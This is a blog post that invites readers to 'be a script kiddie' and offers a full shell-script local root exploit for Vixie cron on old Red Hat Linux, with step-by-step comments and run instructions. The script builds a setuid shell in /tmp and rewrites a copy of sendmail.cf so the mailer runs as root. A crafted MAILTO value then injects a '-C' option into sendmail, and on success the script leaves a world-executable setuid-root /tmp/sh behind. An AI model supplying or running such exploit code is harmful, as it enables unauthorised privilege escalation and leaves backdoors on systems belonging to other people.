Tuesday, January 29, 2008

Be a script kiddie!

Unix local root exploit (Vixie crontab) — despite the original heading this is not password hacking; the script below abuses cron's MAILTO handling, not password files.
SHELL SCRIPT (Bourne shell, not Perl — note the #!/bin/sh line; the small C program inside it is written out to /tmp by the script itself)
#!/bin/sh
# Vixie crontab exploit (historical, late-1990s).
# Local user can gain root access: the script relies on cron passing the
# crontab's MAILTO value to sendmail on the command line, so a MAILTO that
# starts with "-C/tmp/sendmail.cf" makes sendmail read an attacker-written
# configuration, which in turn runs a helper that makes /tmp/sh setuid root.
# Tested (per the original author) on Red Hat Linux 4.2, 5.0, 5.1, 6.0.
# Programmed by Karthik.P
#
# Things a reader should know before running it: every artifact is staged
# under fixed, predictable names in /tmp, the user's existing crontab is
# replaced, and on success a world-executable setuid-root /tmp/sh is left
# on the machine.

# Pin the search path so cc/gcc, sed, crontab etc. resolve predictably.
PATH=/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin
export PATH

# Banner (blank line, two credit lines, blank line), then the first stage name.
printf '\n%s\n%s\n\n' \
  "PLUS ( Postech Laboratory for Unix Security ) http://postech.edu/plus" \
  "PosLUG ( Postech Linux User Group ) http://postech.edu/group/poslug"
printf 'make shell\n\n'
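# Stage 1: write and build the shell that /tmp/makesh will later turn into a
# setuid-root binary.  The source goes to a fixed path in /tmp, so another
# local user who pre-creates /tmp/sh.c or /tmp/sh can interfere with it.
# The heredoc delimiter is quoted: the C source is copied literally.
# The header names were lost in the page's HTML extraction (bare "#include"
# lines); unistd.h is the one that declares setuid, setgid and execl.
cat > /tmp/sh.c << 'EOF'
#include <stdio.h>
#include <unistd.h>

/* Once the file is root-owned and setuid (done by /tmp/makesh), the
 * setuid(0)/setgid(0) calls succeed and a root /bin/sh is exec'd. */
int main(void)
{
	setuid(0);
	setgid(0);
	/* execl's argument list must end in a null pointer; a bare 0 is an int
	 * and is not a full-width null pointer on every ABI. */
	execl("/bin/sh", "sh", (char *)0);
	return 0;
}
EOF
printf 'compile shell\n\n'
# The original listing had "cc ..." and "gcc ..." collapsed onto one line,
# which would pass "gcc -o ..." as arguments to cc.  Try cc, fall back to gcc.
cc -o /tmp/sh /tmp/sh.c || gcc -o /tmp/sh /tmp/sh.c
# Stop here if there is no binary; otherwise the later stages would install
# a crontab and finally try to run a file that does not exist.
if [ ! -x /tmp/sh ]; then
	echo "could not compile /tmp/sh.c" >&2
	exit 1
fi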
printf 'make execute shell script\n\n'
# Stage 2: the helper that the doctored sendmail.cf runs in place of
# procmail (its P= and A= entries are rewritten below).  When sendmail runs
# it with DefaultUser=0:0 it turns /tmp/sh into a setuid-root binary.
# Note that 4755 is world-executable: any local user can then use /tmp/sh.
# Quoted delimiter: the helper's text contains nothing to expand, and is
# written out exactly as shown.
cat > /tmp/makesh << 'EOF'
#!/bin/sh
chown root /tmp/sh
chgrp root /tmp/sh
chmod 4755 /tmp/sh
EOF
chmod 755 /tmp/makesh
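printf 'hack sendmail.cf\n\n'
# Stage 3: derive an alternate sendmail.cf from the system one.
#   - "O DefaultUser=8:12" -> "0:0": the identity sendmail uses for the
#     mailer becomes root.  8:12 is the Red Hat value the original targets;
#     if the host's file says something else this pattern must be adjusted.
#   - the procmail mailer's program (P=) and argv[0] (A=) are pointed at
#     /tmp/makesh, so delivering the cron mail runs the helper.
# The original did this through three temp files and the DefaultUser edit
# was lost: it was written to /tmp/sendmail.cf, while the P= and A= edits
# were applied to the unmodified copy and then copied over it.  One sed pass
# with all three expressions keeps every edit and needs no temp files.
# "#" is the delimiter for the P= expression because the paths contain "/"
# (the page's copy of that line was unusable as printed for that reason).
if [ ! -r /etc/sendmail.cf ]; then
	echo "/etc/sendmail.cf is not readable" >&2
	exit 1
fi
sed -e 's/O DefaultUser=8:12/O DefaultUser=0:0/g' \
    -e 's#P=/usr/bin/procmail#P=/tmp/makesh#g' \
    -e 's/A=procmail/A=makesh/g' /etc/sendmail.cf > /tmp/sendmail.cf
# If the procmail mailer line was not matched nothing will run as root;
# say so instead of silently continuing.
grep -q 'P=/tmp/makesh' /tmp/sendmail.cf ||
	echo "warning: procmail mailer not found in /etc/sendmail.cf; the rewrite did nothing" >&2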
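printf 'make cron file\n\n'
# Stage 4: the crontab.  MAILTO is handed to sendmail as the recipient;
# starting it with "-C/tmp/sendmail.cf" makes sendmail read the doctored
# configuration from stage 3 instead of /etc/sendmail.cf, and the real user
# name after it keeps the mail deliverable.  The user name is expanded now,
# while the file is written (unquoted heredoc).
# cron only sends mail when the job produces output; a plain "ls" in an
# empty home directory prints nothing and sendmail is never started, so
# "ls -a" (always lists "." and "..") is used instead.
cat > /tmp/cronfile << EOF
MAILTO=-C/tmp/sendmail.cf $(whoami)
* * * * * ls -a
EOF
printf 'input cron file\n\n'
# NOTE: this replaces the user's existing crontab outright and the cleanup
# stage does not restore it; save "crontab -l" output first if it matters.
crontab /tmp/cronfile || exit 1
printf 'wait for 1 minute\n\n'
# cron fires at the top of the minute; sleep until 5 seconds past the next
# one.  ${sec#0} strips a leading zero so "08" is not read as octal by $(( )).
sec=$(date +%S)
sleep $((65 - ${sec#0}))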


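printf 'execute shell\n\n'
# Stage 5: /tmp/sh is only useful if /tmp/makesh actually ran as root.
# Check the setuid bit and root ownership (ls -n prints the numeric uid in
# field 3) before dropping into it; otherwise the original would silently
# hand back an unprivileged shell and then clean up as if it had worked.
if [ -u /tmp/sh ] && [ "$(ls -ln /tmp/sh | awk '{print $3}')" = 0 ]; then
	/tmp/sh
else
	echo "/tmp/sh is not setuid root: the cron/sendmail step did not run /tmp/makesh as root" >&2
fi
printf 'delete data files\n\n'
# Cleanup removes the staging files and empties the crontab.  What stays
# behind: /tmp/sh itself (setuid root, mode 4755, usable by anyone on the
# host) and nothing of the user's pre-exploit crontab.
# Absolute paths, so a failed "cd /tmp" cannot turn this into an rm in
# whatever the current directory happens to be.
rm -f /tmp/sendmail.cf /tmp/cronfile /tmp/makesh /tmp/sh.c
crontab /dev/null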


To make this work: cut away what comes before "#!/bin/sh" and after "crontab /dev/null", save it as something like crontab_exploit.sh, run "chmod a+x crontab_exploit.sh", then "./crontab_exploit.sh". Be aware of what it does to the machine: it targets the unpatched Vixie cron shipped with Red Hat Linux 4.2–6.0 using sendmail as the mailer (the "-C" in MAILTO is the whole trick), it replaces the current user's crontab and does not restore it, and on success it leaves a world-executable setuid-root /tmp/sh behind.
